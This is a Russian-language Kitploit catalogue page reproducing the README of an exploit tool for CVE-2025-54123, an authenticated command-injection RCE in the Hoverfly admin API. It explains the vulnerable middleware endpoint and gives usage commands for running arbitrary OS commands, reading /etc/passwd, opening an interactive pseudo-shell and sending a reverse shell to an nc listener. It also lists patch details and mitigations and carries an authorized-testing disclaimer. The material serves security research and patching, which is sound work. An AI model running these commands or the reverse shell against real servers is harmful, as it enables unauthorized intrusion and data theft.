Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Hoverfly-1.11.3-RCE-CVE-2025-54123-Exploit — Эксплойт для аутентифицированного RCE в Hoverfly ≤ 1.11.3 (CVE-2025-54123) через внедрение команд ОС в API middleware. Поддерживает выполнение одной команды, интерактивный псевдо-шелл и обратный шелл для авторизованного тестирования безопасности. | Kitploit
Инструменты/GitHubGitHub/0x00phantom-hat/hoverfly-1.11.3-rce-cve-2025-54123-exploit
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеСтатьи и ИсследованияОбучение и ОбразованиеRed TeamingРазработка Полезной Нагрузки

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub0x00phantom-hat/hoverfly-1.11.3-rce-cve-2025-54123-exploit

Hoverfly-1.11.3-RCE-CVE-2025-54123-Exploit

Эксплойт для аутентифицированного RCE в Hoverfly ≤ 1.11.3 (CVE-2025-54123) через внедрение команд ОС в API middleware. Поддерживает выполнение одной команды, интерактивный псевдо-шелл и обратный шелл для авторизованного тестирования безопасности.

Репозиторий
12 месяцев назадЕщё не проверено

CVE-2025-54123 — Удаленное выполнение кода через Middleware API в Hoverfly

Аутентифицированное RCE через внедрение команд ОС в Hoverfly ≤ 1.11.3

Обзор уязвимости

СвойствоЗначение
Идентификатор CVECVE-2025-54123
Оценка CVSS9.8 — Критическая
Вектор CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-78 (Внедрение команд ОС), CWE-20 (Некорректная проверка ввода)
ПродуктHoverfly — инструмент симуляции API с открытым исходным кодом
ЗатронутоВсе версии до 1.11.3 включительно
Исправлено в1.12.0 (коммит исправления)
УведомлениеGHSA-r4h8-hfp2-ggmf

Технический анализ

Вот глубокий анализ кейса и технический анализ с точки зрения белого и черного ящиков https://medium.com/@phantom_hat/cve-2025-54123-hoverfly-1-11-3-command-injection-rce-case-study-patch-diffing-aacc092f7f3a

Поверхность атаки

Hoverfly предоставляет RESTful admin API (порт по умолчанию 8888) для управления конфигурациями симуляции. Конечная точка управления промежуточным ПО по адресу /api/v2/hoverfly/middleware принимает JSON-тело с полями binary и script, которые определяют внешний процесс промежуточного ПО.

Корневая причина

Уязвимость возникает из-за комбинации трех ошибок на уровне кода:

  1. Недостаточная проверка ввода — middleware.go:93-96: Функция SetBinary() принимает параметр binary без какой-либо проверки или санитизации, что позволяет злоумышленнику указать произвольные исполняемые файлы (например, bash).

  2. Небезопасное выполнение команд — local_middleware.go:14-19: Промежуточное ПО выполняется через exec.Command() с передачей контролируемых злоумышленником значений binary и script напрямую в качестве аргументов, что позволяет внедрять команды ОС.

  3. Немедленное выполнение при тестировании — hoverfly_service.go:173: При установке промежуточного ПО через API Hoverfly сразу же тестирует его, выполняя его, что вызывает внедренную команду на этапе конфигурации, а не во время перехвата прокси.

Схема атаки

root@kitploit:~
Attacker                              Hoverfly (≤ 1.11.3)
   │                                        │
   │─── POST /api/token-auth ──────────────>│  (1) Authenticate
   │<── { "token": "eyJ..." } ─────────────│
   │                                        │
   │─── PUT /api/v2/hoverfly/middleware ───>│  (2) Inject payload
   │    { "binary": "bash",                 │
   │      "script": "<malicious cmd>" }     │
   │                                        │
   │    ┌──────────────────────────────────┐│
   │    │ exec.Command("bash", tmpScript)  ││  (3) Immediate execution
   │    │ → attacker command runs as       ││
   │    │   the Hoverfly process user      ││
   │    └──────────────────────────────────┘│
   │                                        │
   │<── Command output in error response ──│  (4) Exfiltrate output
   │                                        │

Использование эксплойта

Предварительные требования

  • Python 3.8+
  • Действительные учетные данные для admin API Hoverfly (по умолчанию: admin / настраиваемый пароль)

Установка

root@kitploit:~
git clone https://github.com/<your-username>/CVE-2025-54123.git
cd CVE-2025-54123
pip install -r requirements.txt

Режимы работы

Режим только проверки

Проверьте доступность цели и аутентификацию без эксплуатации:

root@kitploit:~
python3 exploit.py -u http://target:8888 -U admin -P <password> -C

Выполнение одной команды

Выполните одну команду ОС на цели:

root@kitploit:~
python3 exploit.py -u http://target:8888 -U admin -P <password> -c 'id'

Интерактивная псевдо-оболочка

Войдите в постоянную сессию оболочки:

root@kitploit:~
python3 exploit.py -u http://target:8888 -U admin -P <password> -i

Обратная оболочка

Отправьте обратную оболочку на ваш слушатель:

root@kitploit:~
# Terminal 1 — start listener
nc -lvnp 4444

# Terminal 2 — launch exploit
python3 exploit.py -u http://target:8888 -U admin -P <password> --revshell 10.0.0.1:4444

Подробный режим с прокси

Направьте трафик через Burp Suite для инспекции:

root@kitploit:~
python3 exploit.py -u http://target:8888 -U admin -P <password> -c 'cat /etc/passwd' --proxy -v

Полный справочник флагов


Устранение уязвимости

Детали патча

Исправление в коммите 17e60a9 отключает API установки промежуточного ПО по умолчанию. Последующие изменения в документации (коммит a9d4da7) информируют пользователей о последствиях безопасности предоставления доступа к этой конечной точке.


Ссылки

  • NVD — CVE-2025-54123
  • Уведомление безопасности GitHub — GHSA-r4h8-hfp2-ggmf
  • Уязвимый код — hoverfly_service.go#L173
  • Уязвимый код — middleware.go#L93
  • Уязвимый код — local_middleware.go#L13
  • Коммит исправления — 17e60a9

Отказ от ответственности

Этот инструмент предоставляется только для авторизованного тестирования безопасности и образовательных исследовательских целей. Несанкционированный доступ к компьютерным системам является незаконным в соответствии с Законом о компьютерном мошенничестве и злоупотреблениях (CFAA) и аналогичными законами по всему миру. Автор не несет ответственности за неправильное использование данного программного обеспечения. Всегда получайте явное письменное разрешение перед тестированием любой системы, которая вам не принадлежит.


Структура проекта

root@kitploit:~
CVE-2025-54123/
├── Exploit/
│   ├── exploit.py          # Отшлифованный эксплойт
│   └── raw_exploit.py      # Исходный черновой PoC
├── Images/                 # Скриншоты исследования
├── Reference/              # Справочные эксплойты для изучения
├── requirements.txt        # Зависимости Python
└── README.md               # Этот файл

Автор

Phantom Hat — Исследователь безопасности


Это исследование было проведено в рамках кейс-стади уязвимости в образовательных целях.

Скачать инструмент
ФлагОписаниеПо умолчанию
-u, --urlURL цели HoverflyОбязательно
-U, --usernameИмя пользователя администратораОбязательно
-P, --passwordПароль администратораОбязательно
-c, --commandКоманда ОС для выполнения—
-C, --checkРежим только проверки (без эксплуатации)false
-i, --interactiveИнтерактивная псевдо-оболочкаfalse
--revshellОбратная оболочка LHOST:LPORT—
--proxyМаршрутизация через 127.0.0.1:8080false
--timeoutТаймаут запроса (секунды)15
-v, --verboseВключить подробный выводfalse
ДействиеПодробности
ОбновлениеОбновите Hoverfly до v1.12.0 или новее, где API установки промежуточного ПО отключен по умолчанию
Сегментация сетиОграничьте доступ к admin API Hoverfly (порт 8888) только доверенными сетями
АутентификацияИспользуйте надежные уникальные пароли для admin API Hoverfly
МониторингОтслеживайте неожиданные запросы PUT к /api/v2/hoverfly/middleware